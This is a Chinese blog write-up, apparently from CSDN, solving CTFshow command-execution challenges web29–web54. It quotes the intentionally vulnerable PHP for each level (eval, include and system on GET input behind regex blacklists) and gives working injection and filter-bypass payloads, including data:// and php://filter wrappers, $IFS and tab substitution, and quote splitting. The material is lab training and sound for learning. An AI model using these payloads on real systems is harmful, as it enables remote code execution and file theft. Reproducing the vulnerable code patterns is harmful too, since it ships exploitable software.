CTFshow命令执行

最新推荐文章于 2023-03-29 18:01:16 发布
最新推荐文章于 2023-03-29 18:01:16 发布
阅读量517 收藏 1
点赞数 1
分类专栏: CTF日记 文章标签: shell web 安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47813861/article/details/119673134
版权

web29

payload:?c=system('ls');查看当前文件
?c=system('tac fla*');通过正则表达式绕过preg_match函数,查看内容

我自己是用more和cat试过,发现无法显示,后来发现在源代码中显现但被注释所以无法显示在前端,用tac可以破坏注释结构,直接显示

web30

源码:

if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

payload:?c=echo `tac *`;

web31

更加严格的过滤方式,可以用上题payload,但要注意这题过滤了空格。所以可以用tab%09,来绕过。

if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

payload:?c=echo%09`tac%09*`;
or?c=passthru("tac%09*");

web32-36

基本可以通过include和php伪代码来实现绕过。

#web32的题目
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

payload:?c=include$_POST[a]?>
request:a=php://filter/read=convert.base64-encode/resource=flag.php
or
?c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php

## web37 
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c);
        echo $flag;
    }
    
}else{
    highlight_file(__FILE__);
}

payload:?c=data://text/plain,<?php system('tac fla*')?>

web38

if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|php|file/i", $c)){
        include($c);
        echo $flag;
    }
}

payload1:跟上题目一致,将<?php?>改成<??>。后者是php的短标签。
payload2:
?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCJ0YWMgZmxhZy5waHAiKTs/PiA=

web39

if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c.".php");
    }
        
}else{
    highlight_file(__FILE__);
}

在原有基础上,加了.php这个后缀。上题payload仍可用。不过要注意的是,不要用短标签形式。

web40&41

web42

if(isset($_GET['c'])){
    $c=$_GET['c'];
    system($c." >/dev/null 2>&1");
}

关于>/dev/null 2>&1详情可见此博客
基本意思是将所有内容写入一个黑洞,没有显示
可通过; ||来绕过。

payload:?c=tac fla?.php;

web43

if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}

payload:?c=tac fla?.php||
or
?c=tac fla?.php%26%26ls
#&&编码后即为%26%26,反正姿势很多。。

web44

if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/;|cat|flag/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

姿势多学

payload:?c=tac fla?.php%0a

web45

if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| /i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

多加了个空格,用tab,即%09绕过

?c=tac%09fla?.php||

web46

添加了0-9、$、*

if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

上一题payload仍可用

web47

if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}

同上

web48、49

同上payload

web50

基本过滤了上几题的方法

if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

全新姿势

?c=nl<f''lag.php||
or
?c=tac<fla\g.php||

web51

多加了tac,可用nl来绕过

if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

?c=nl<fla''g.php||
or
?c=ta\c<>fla\g.php||

web52

<>被过滤了,但特意留了个$

if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i", $c)){
        system($c." >/dev/null 2>&1");
    }
}

在shell中,有一个好用的环境变量$IFS,用于内部字段分隔符。默认是空格符

因为此题flag不在flag.php中,所以可以先查看一下根目录下的文件

?c=ls$IFS/||ls

如图:
在这里插入图片描述
确定当前文件夹位置:

?c=pwd$IFS||ls

为此:/var/www/html

所以返回根目录查看

?c=ta\c$IFS../../../fla?||ls

web53

if(!preg_match("/\;|cat|flag| |[0-9]|\*|more|wget|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i", $c)){
        echo($c);
        $d = system($c);
        echo "<br>".$d;
    }

payload:
?c=ta''c${IFS}fla?.php
OR
c''at${IFS}fla''g.p''hp(官方hint)

web54

if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|.*c.*a.*t.*|.*f.*l.*a.*g.*| |[0-9]|\*|.*m.*o.*r.*e.*|.*w.*g.*e.*t.*|.*l.*e.*s.*s.*|.*h.*e.*a.*d.*|.*s.*o.*r.*t.*|.*t.*a.*i.*l.*|.*s.*e.*d.*|.*c.*u.*t.*|.*t.*a.*c.*|.*a.*w.*k.*|.*s.*t.*r.*i.*n.*g.*s.*|.*o.*d.*|.*c.*u.*r.*l.*|.*n.*l.*|.*s.*c.*p.*|.*r.*m.*|\`|\%|\x09|\x26|\>|\</i", $c)){
        system($c);
    }
}

payload:
?c=grep${IFS}show${IFS}fla?.php
or
?c=mv${IFSfla?.php}${IFS}a.txt
再直接查看a.txt内容

持续更新…

二码农丫
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
ctfshow命令执行(web29-web56)第一部分
qq_63928796的博客
10-05 1664
过滤了flag可以用*或者?绕过。
ctfshow web入门命令执行部分(更新至56)
L1ni01
10-16 3090
ctfshow web 入门 命令执行部分 web29 源码 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } payload:c=system('cat f*'); 匹配任何字符串/文本,包括空字符串;
CTFshow命令执行web29-web54
weixin_51614272的博客
02-23 2511
web29 源码 if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } eval函数,把GET方法获取的变量c内容,当做命令执行 过滤了flag关键字,不区分大小写 构造payload: ?c=system("tac fla?.php"); ?c=system("t
[WUSTCTF2020]朴实无华
qq_52907838的博客
07-24 327
打开环境,显示: 标题为繁体,意思是:人间极乐bot 看到bot就应该想到robots.txt,访问robots.txt: 看到有个fAke_f1agggg.php,一看就不是答案,但还是要访问: 这明显不是,再看看源码,看看响应头: 有个fl4g.php,再访问: 得到这样一个页面,是繁体,整理翻译后,其中的代码为: <?php header('Content-type:text/html;charset=utf-8'); error_reporti...
threads php,php安装threads多线程扩展
weixin_36473855的博客
03-11 161
[PHP] syntaxhighlighter_viewsource syntaxhighlighter_copycode
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
ctfshow web185 正则爆破脚本
10-21
ctfshow web185 正则爆破脚本,以true拼接形成数字,实现ascii代替数字、字母和特殊符号
ctfshow web240 insert 爆破表名
10-21
ctfshow web240 insert 爆破表名
[BJDCTF2020]EzPHP
08-11 280
打开之后是卡巴斯基的网络威胁实时地图,右键不能查看源码 F12打开调试器,查看元素 base32解码,得到了一个页面,打开之后是源码, <?php highlight_file(__FILE__); error_reporting(0); $file = "1nD3x.php"; $shana = $_GET['shana']; $passwd = $_GET['passwd']; $arg = ''; $code = ''; echo "<br /><...
CTFshow-PHP特性89-90
weixin_51706044的博客
09-29 796
web89 if(isset($_GET['num'])){<br /> $num = $_GET['num'];<br /> if(preg_match("/[0-9]/", $num)){ //正则匹配参数不能为0-9<br /> die("no no no!");<br /> }<br /> if(intval($num)){ //返回num参数的值是,整数型<br /> echo $flag;<br /> }&lt.
CTFShow PHP特性
paidx0
07-03 656
##开始PHP特性 web89 if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; preg_match()返回 pattern的匹配次数。 它的值将是0次(不匹配)或1次,因为preg_match()在第一次匹配后 将会停止搜索。 可以通
php特性(持续更新)
weixin_74427106的博客
03-29 264
它让我们不要输出数字,还需要让num为数字,但看到intval 我们就需要敏感;intval函数还有这一特点:intval处理一个数组对象时,会返回1;php特性一些函数的使用。先分析一下这个php代码。一下两个函数官方的解释。
UUCTF(公共赛道)
qq_62046696的博客
11-09 1138
sys|pas|read|file|ls|cat|tac|head|tail|more|less|php|base|echo|cp|\$|\*|\+|\^|scan|\.|local|current|chr|crypt|show_source|high|readgzfile|dirname|time|next|all|hex2bin|im|shell禁用了许多的命令,但是没有禁用掉\,这不就可以进行转义了吗。思路很简单,就是可能被以前的思想限制了,直接用a的地址空间,然后a和b用的一个内存变量,所以给。
ctfshow web入门 命令执行
qq_50589021的博客
10-07 2731
命令执行 web29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } ?> 考点: 绕过特殊字符的过滤 payload: ?c=system('ls');//flag.php index.php ?
CTF中的Bypass命令执行
D.MIND 的博客
08-03 2500
linux命令敏感字符绕过 反斜杠: ca\t 1.txt 连接符——单引号: ca''t 1.txt 变量拼接字符: a=ca;b=t;$a$b 1.txt base64编码绕过: `echo 'Y2F0Cg==' | base64 -d` 1.txt 命令提示符$: ca$@t 1.txt //$@ 是传给脚本的所有参数的列表 ca$9t 1.txt //$9 是传递给该shell脚本的第九个参数 ...
RCE-命令执行总结
m0_62008601的博客
11-23 939
命令执行总结,更新ing~~
CTFshow命令执行29-123
qq_43534481的博客
08-06 1422
CTFshow命令执行WP
ctfshow web入门命令执行
最新发布
09-05
在CTF中,web入门命令执行指的是通过Web应用程序的漏洞,将恶意的命令注入到应用程序中并执行。这样的攻击可以导致未经授权的访问和操纵应用程序的数据和功能。 根据引用中提供的信息,可以看到一些常见的双写绕过技巧,如分号、竖线、双与号等。这些技巧可以用来绕过应用程序对输入参数的限制,从而注入恶意的命令。 引用中提到的payload,其中使用了一个通用的命令执行函数"show_source"来显示指定文件的源代码。这个payload可以用来尝试执行"flag.php"文件的源代码。但前提是要知道有一个名为"flag.php"的文件存在。 另外,引用中提供了另一种payload的示例,其中使用了array_reverse和scandir函数来获取文件目录并显示指定文件的源代码。同样,也可以直接使用show_source('flag.php')来显示"flag.php"文件的源代码。 需要注意的是,命令执行漏洞是非常危险的,因为它可以导致恶意用户执行任意的系统命令。为了保护Web应用程序免受此类攻击,开发人员应该对用户的输入进行严格的验证和过滤,并使用安全的编程实践来防止命令注入漏洞的发生。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [ctfshow web入门之命令执行](https://blog.csdn.net/uuzfumo/article/details/128357863)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [CTFShow Web入门 命令执行](https://blog.csdn.net/qq_19533763/article/details/123910732)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值